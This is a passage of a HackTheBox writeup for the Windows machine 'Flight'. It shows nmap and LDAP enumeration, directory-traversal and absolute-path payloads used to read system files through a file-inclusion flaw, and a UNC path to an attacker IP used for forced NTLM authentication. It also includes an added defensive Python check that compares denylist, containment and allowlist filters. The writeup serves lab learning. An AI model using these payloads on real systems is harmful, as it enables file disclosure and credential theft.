<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Flight - HackTheBox Writeup (10.10.11.187) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Flight - HackTheBox Writeup (10.10.11.187)">
<meta name="description" content="Hard-difficulty Windows machine that covers forced NTLM authentication techniques through Remote File Inclusion and SCF file attacks. Lots of pivoting between service accounts and user accounts using web shells. Privilege escalation by abusing SeImpersonatePrivilege to perform token impersonation.">
<meta property="og:description" content="Hard-difficulty Windows machine that covers forced NTLM authentication techniques through Remote File Inclusion and SCF file attacks. Lots of pivoting between service accounts and user accounts using web shells. Privilege escalation by abusing SeImpersonatePrivilege to perform token impersonation.">
<meta property="og:image" content="https://www.hackthebox.com/storage/avatars/a7af9035e5089332dfbfeb328d663f3e.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.com/storage/avatars/a7af9035e5089332dfbfeb328d663f3e.png"></span>
</div>
<h1 class="Header__Title">Flight - HackTheBox Writeup (10.10.11.187)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sat, Aug 12, 2023</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Hard">Hard</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Windows">Windows</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/Forced_Authentication">Forced Authentication</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--gray">
<a href="tag/Token_Impersonation">Token Impersonation</a>
</span>
</div>
<div>
Hard-difficulty Windows machine that covers forced NTLM authentication techniques through Remote File Inclusion and SCF file attacks. Lots of pivoting between service accounts and user accounts using web shells. Privilege escalation by abusing SeImpersonatePrivilege to perform token impersonation.
</div>
</header>
<article id="https://www.notion.so/1e08c20a363a4ed884c197a4fb25036b" class="PageRoot"><h2 id="https://www.notion.so/f09c27f951f542b5ad12e2bd589d9489" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/f09c27f951f542b5ad12e2bd589d9489"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Preface</span></span></h2><div id="https://www.notion.so/b8d8fd74ed5e4d0ebf575eb637f88e60" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This was an incredibly challenging machine for me. Not only was the attack path extremely convoluted and more complicated than anything I had ever done, but there were quite a few techniques that I had not encountered before, namely the privilege escalation technique via </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString">.</span></span></p></div><div id="https://www.notion.so/928d12a1296b46dea205cb2c24be49a0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Overall, this was a great learning experience. It made me really rethink the potential of forced NTLM authentication as a method of gaining initial access, especially if password policies are sloppy within an organisation. 
</span></span></p></div><h2 id="https://www.notion.so/b947bac4451b45d3b610bb4f90dbfd71" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/b947bac4451b45d3b610bb4f90dbfd71"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Reconnaissance</span></span></h2><div id="https://www.notion.so/8197287b6bdf46dfb23270e9beea5ac0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We start by doing a port scan to see what services we can access.</span></span></p></div><div id="https://www.notion.so/af739ab8dc9d4dfa9ec93230390e85af" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.11.187 | tee ports-tcp.nmap</code></span></span></p></div><pre id="https://www.notion.so/6f8b2ba1d8ce4ad4a3039bc9f314bfd3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for 10.10.11.187
Host is up (0.030s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
5985/tcp open wsman
9389/tcp open adws</span></span></span></code></pre><div id="https://www.notion.so/a60a69dfaee240c9be09b07644473a0f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like lots of ports are open, let’s do a script and version scan to see what services are being hosted on these ports:</span></span></p></div><div id="https://www.notion.so/49a5fba0de2643bf9b3d372c1ce2e79d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,5985,9389 10.10.11.187 | tee targeted-tcp.nmap</code></span></span></p></div><pre id="https://www.notion.so/c262e885f57043debbe42d5402527d19" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Nmap scan report for 10.10.11.187
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-21 20:11:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-21T20:11:15
|_ start_date: N/A
|_clock-skew: 6h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.09 seconds</span></span></span></code></pre><div id="https://www.notion.so/dbf711f1feab460b83e3d5b37834df1f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Under the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ldap</code></span><span class="SemanticString"> entry, we see that our target is an Active Directory domain controller for the domain “flight.htb”. Let’s add the target IP and hostname to our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file:</span></span></p></div><div id="https://www.notion.so/db087fcfc10c4bd498e7b7b89f8ef3fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/8de9b0701f514b58be472e13810c9b75" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.11.187 flight.htb</span></span></span></code></pre><h2 id="https://www.notion.so/43ca1da1fc5c432284f604cc333842f1" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/43ca1da1fc5c432284f604cc333842f1"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span 
class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/06026a54e2f1499a9a20facac552b8a5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">LDAP enumeration</strong></span></span></p></div><div id="https://www.notion.so/52d4e6ddfcfa44e4ad5a6dec66498e47" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let’s begin by searching LDAP with simple authentication and see if we can obtain any information of interest:</span></span></p></div><div 
id="https://www.notion.so/85144712557745f6bacd25253653ba53" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ldapsearch -x -h flight.htb -s base namingcontexts</code></span></span></p></div><pre id="https://www.notion.so/dd947b83584f4ffebe8b8529ec29e955" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span># extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=flight,DC=htb
namingcontexts: CN=Configuration,DC=flight,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=flight,DC=htb
namingcontexts: DC=DomainDnsZones,DC=flight,DC=htb
namingcontexts: DC=ForestDnsZones,DC=flight,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1</span></span></span></code></pre><div id="https://www.notion.so/b4087373e4004dccae8fe87686bf7e9d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We get the domain naming context again, but we already have this information from the nmap scan. Let’s see if the server accepts anonymous bind with the query:</span></span></p></div><div id="https://www.notion.so/bcb94b768cde4426bacea54a7a175f31" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ldapsearch -x -h flight.htb -b "DC=flight,DC=htb"</code></span></span></p></div><pre id="https://www.notion.so/f2b9a76f1d6e4c30812cf8d1102c98ba" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span># extended LDIF
#
# LDAPv3
# base <DC=flight,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1</span></span></span></code></pre><div id="https://www.notion.so/786bb247717143789a3c0de7b7a3e243" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">No dice: anonymous bind is disallowed, so let’s come back when we have some credentials.</span></span></p></div><div id="https://www.notion.so/151985eda82a424482d9c38ca03970e7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP enumeration</strong></span></span></p></div><div id="https://www.notion.so/eca01d256afa4bd1a2eab6e589a26a1e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We continue our enumeration by exploring port 80. 
Navigating to the site:</span></span></p></div><div id="https://www.notion.so/b215525a0f1b4d11b6a03126e2f5caa8" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F575895a5-0cf8-4eba-b5a5-00c124efee3e%2FUntitled.png?width=1326&table=block&id=b215525a-0f1b-4d11-b6a0-3126e2f5caa8"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F575895a5-0cf8-4eba-b5a5-00c124efee3e%2FUntitled.png?width=1326&table=block&id=b215525a-0f1b-4d11-b6a0-3126e2f5caa8" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/f78f1c47c7ba4bc3bd9c8107cf16c183" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This site seems to be an air travel website with a flight planner app. However, none of the buttons seem to do anything so let’s move on and try to enumerate for subdomains:</span></span></p></div><div id="https://www.notion.so/557d473d6944481997c447da5076598b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster vhost -w ~/Desktop/HTB/Common/subdomains-top1million-110000.txt -u flight.htb</code></span></span></p></div><pre id="https://www.notion.so/5d0eabfc86f4401989113e7830560de8" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://flight.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kali/Desktop/HTB/Common/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/21 23:47:10 Starting gobuster in VHOST enumeration mode
===============================================================
Found: school.flight.htb (Status: 200) [Size: 3996]</span></span></span></code></pre><div id="https://www.notion.so/86486b845fb245588c9480e30a531174" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">There is a hidden subdomain by the name </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">school.flight.htb</code></span><span class="SemanticString">, let’s add this to the line we made in our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file earlier. Navigating to the new subdomain: </span></span></p></div><div id="https://www.notion.so/437e9c228f244f7d9184432693c6a67d" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcca32028-6358-4010-9a68-0bbe4e2f441c%2FUntitled.png?width=1326&table=block&id=437e9c22-8f24-4f7d-9184-432693c6a67d"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcca32028-6358-4010-9a68-0bbe4e2f441c%2FUntitled.png?width=1326&table=block&id=437e9c22-8f24-4f7d-9184-432693c6a67d" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/fa789f5c67814e0cbdc11a5ffee16d72" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It seems like our target also has a website for its aviation school, let’s keep exploring further…</span></span></p></div><h2 id="https://www.notion.so/479037d47b334eed9dfe7bf780ab4b74" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/479037d47b334eed9dfe7bf780ab4b74"><svg width="16" height="16" 
viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><div id="https://www.notion.so/0b851b3e842e4a409483ec467f166005" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">LFI vulnerability in “view” parameter</strong></span></span></p></div><div id="https://www.notion.so/57e582b009f9496193299432d0a6171f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">While checking out the different pages, we notice in the URL bar that the website uses the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">view</code></span><span class="SemanticString"> GET parameter to specify the page it’s displaying:</span></span></p></div><div id="https://www.notion.so/01aa9bcc46b1481e903d9e1e36a634af" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=</code></span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code"><span class="SemanticString__Fragment SemanticString__Fragment--Unknown"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">about.html</strong></span></code></span></span></p></div><div id="https://www.notion.so/104d958a272342e8823dd83f478ebd49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This is a somewhat peculiar way of displaying pages, and it led me to think there could be some form of local file inclusion (LFI) vulnerability in that parameter. 
Let’s try to verify this by putting in some directory traversal characters, and since this is a Windows box, let’s see if we can reach its hosts file at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:/Windows/System32/drivers/etc/hosts</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/858621e83f6b49a0b26eabaa3d45d744" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=../../../../../../../Windows/System32/drivers/etc/hosts</code></span></span></p></div><div id="https://www.notion.so/cfcf3e61e6934f91a5ffa15a9a045b16" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F62ad1b7e-b6d4-41f3-813f-e8a5cd5533e9%2FUntitled.png?width=1034&table=block&id=cfcf3e61-e693-4f91-a5ff-a15a9a045b16"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F62ad1b7e-b6d4-41f3-813f-e8a5cd5533e9%2FUntitled.png?width=1034&table=block&id=cfcf3e61-e693-4f91-a5ff-a15a9a045b16" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/d41a99ac65f0452f9b692ac0eb524890" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Huh, looks like we hit some kind of a blacklist, let’s try to bypass it with some basic URL encoding:</span></span></p></div><div id="https://www.notion.so/bcc096cf1f294969bcfdf2a116d5844c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code 
class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows/System32/drivers/etc/hosts</code></span></span></p></div><div id="https://www.notion.so/fab30cb120e0427ea5f3a70954ba1419" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It’s still blocking our request, how about if we try with absolute paths instead?</span></span></p></div><div id="https://www.notion.so/254ca79c474a4370b864001cdfd733f6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=C:/Windows/System32/drivers/etc/hosts</code></span></span></p></div><div id="https://www.notion.so/b657c029b9494a5a856e41603bc83b24" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F50345e43-c9d6-418e-b91c-dc9149ae78a3%2FUntitled.png?width=1034&table=block&id=b657c029-b949-4a5a-856e-41603bc83b24"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F50345e43-c9d6-418e-b91c-dc9149ae78a3%2FUntitled.png?width=1034&table=block&id=b657c029-b949-4a5a-856e-41603bc83b24" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/c39c7c0269ce4e22bdad8a310b398ca6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Worked like a charm! 
Looks like it was detecting the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">../</code></span><span class="SemanticString"> sequence and blocking the request accordingly, but it turns out we didn’t need it anyway. We can now see the contents of the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hosts</code></span><span class="SemanticString"> file. Using this technique, we can fuzz for files on the system with a </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt">wordlist</a></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/f92c9c9bdf65481d97ff8c5ea2f8f18c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wfuzz -f ./fuzz-output.csv,csv -c -w ../Common/file_inclusion_windows.txt --hw 89,95 http://school.flight.htb/index.php?view=FUZZ</code></span></span></p></div><div id="https://www.notion.so/0f0452194d234202b7580a294ac9746f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After digging through the results for hours, we were unable to find any useful files.</span></span></p></div><div id="https://www.notion.so/478bf07c6608440ca004744a49fa4f3e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Abusing RFI to force authentication</strong></span></span></p></div><div id="https://www.notion.so/e2c8add77e9844838ac548c775119b0f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It then occurred to me that this is not only a local file inclusion vulnerability, but also a remote one (RFI). 
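</span></span></p></div><div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">The server-side root cause is a denylist: the filter refuses <code class="SemanticString__Fragment SemanticString__Fragment--Code">../</code> but not a drive-absolute path and, as the next step shows, not a UNC path to a host we control either. The Python below is an added illustration, not code from the writeup or from the Flight box. It runs the <code class="SemanticString__Fragment SemanticString__Fragment--Code">view</code> values used above through that denylist, through a containment check that resolves the value beneath a fixed page directory, and through a plain allowlist of page names. The page directory <code class="SemanticString__Fragment SemanticString__Fragment--Code">C:\inetpub\school\pages</code> and the allowlisted names are placeholders I assumed; <code class="SemanticString__Fragment SemanticString__Fragment--Code">ntpath</code> gives Windows path semantics on any OS.</span></span></p></div>

```python
"""Why a '../' denylist fails, and two checks that do not.

Added example, not code from the Flight writeup or from the target site.  The
target is a Windows/PHP host, so paths are modelled with ntpath (Windows path
semantics, usable on any OS).  PAGE_ROOT and ALLOWED_PAGES are placeholders I
assumed; the writeup does not reveal the real page directory or page names.
"""
import ntpath

PAGE_ROOT = r"C:\inetpub\school\pages"  # assumed placeholder, not from the writeup
ALLOWED_PAGES = {"home.html", "about.html", "blog.html", "contact.html"}  # assumed


def denylist_filter(view: str) -> bool:
    """The check the writeup bypasses: only the literal '../' is refused."""
    return "../" not in view


def contained_path(view: str, root: str = PAGE_ROOT):
    """Resolve `view` under `root`; return the resolved path only if it stays inside.

    ntpath.join drops `root` when `view` is absolute (C:\\... or \\\\host\\share)
    and ntpath.normpath collapses '..' segments, so a single prefix test catches
    traversal, drive-absolute paths and UNC paths alike.
    """
    if "\x00" in view:
        return None
    resolved = ntpath.normpath(ntpath.join(root, view))
    root_prefix = ntpath.normcase(ntpath.normpath(root)) + "\\"
    if not ntpath.normcase(resolved).startswith(root_prefix):
        return None
    return resolved


def allowlist_filter(view: str) -> bool:
    """Strictest option: the parameter must name one of a fixed set of pages."""
    return view in ALLOWED_PAGES


# The three view= values from the writeup (the web server has already
# URL-decoded %2F to /), plus one legitimate request for comparison.
PROBES = {
    "legit": "about.html",
    "traversal": "../../../../../../../Windows/System32/drivers/etc/hosts",
    "absolute": "C:/Windows/System32/drivers/etc/hosts",
    "unc": "//10.10.14.47/share",
}


def evaluate(probes=PROBES):
    """Map each probe to (denylist passes, containment passes, allowlist passes)."""
    return {
        name: (denylist_filter(v), contained_path(v) is not None, allowlist_filter(v))
        for name, v in probes.items()
    }


if __name__ == "__main__":
    for name, (deny, contain, allow) in evaluate().items():
        print(f"{name:<10} denylist={deny!s:<5} contained={contain!s:<5} allowlist={allow}")
```

<div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Only the denylist lets the absolute and UNC values through. The containment check is the minimum fix for code that must include arbitrary page files, and the allowlist is the right answer when the set of pages is known; either one also removes the forced-authentication vector described next.</span></span></p></div><div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">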
